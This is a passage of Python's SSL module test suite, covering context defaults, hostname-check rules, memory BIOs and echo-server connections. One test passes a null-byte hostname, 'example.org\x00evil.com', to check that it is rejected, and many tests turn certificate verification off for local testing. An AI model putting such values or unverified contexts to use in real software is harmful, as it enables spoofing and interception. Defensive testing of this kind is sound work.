ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
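# Summary of the invariant exercised above: enabling check_hostname while
# verify_mode is CERT_NONE automatically switches it to CERT_REQUIRED
# (CERT_OPTIONAL is kept), and verify_mode cannot be set back to CERT_NONE
# while check_hostname is enabled: disable check_hostname first, then relax
# verify_mode.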
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
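# Note: MemoryBIO.eof only becomes true once write_eof() has been called
# *and* all buffered data has been read, as the sequence above demonstrates.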
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
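# The unwrap() sequence above mirrors the TLS close_notify exchange over
# memory BIOs: each side's outgoing BIO has to be drained into the peer's
# incoming BIO (c_out -> s_in, s_out -> c_in) before the peer's unwrap()
# completes without raising SSLWantReadError.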
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
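# ssl_io_loop() is the driver used by the BIO tests below; a sketch of the
# call shape (matching test_bio_handshake/test_bio_read_write_data):
#
#   self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
#   buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)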
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. when both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when the connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received, test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
